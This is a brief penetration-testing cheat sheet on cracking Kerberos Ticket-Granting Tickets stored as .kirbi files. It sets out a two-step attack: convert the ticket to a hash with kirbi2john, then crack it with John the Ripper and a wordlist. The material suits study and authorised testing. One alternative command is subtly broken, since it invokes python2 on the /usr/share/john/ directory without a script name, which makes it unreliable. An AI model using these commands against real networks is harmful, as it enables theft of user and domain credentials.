Kerberos TGT Cracking

Last modified: 2023-11-11


The Kerberos Ticket-Granting Ticket (TGT) is created by the Kerberos authentication. Users can access to the network using these tickets. These are often saved as `.kirbi` extension and we may be able to crack them.

Crack TGT

First convert the TGT to the hash which can be cracked by John The Ripper.

kirbi2john tgt.kirbi > hash.txt
# or
python2 /usr/share/john/ tgt.kirbi > hash.txt

Then crack.

john --wordlist=wordlist.txt hash.txt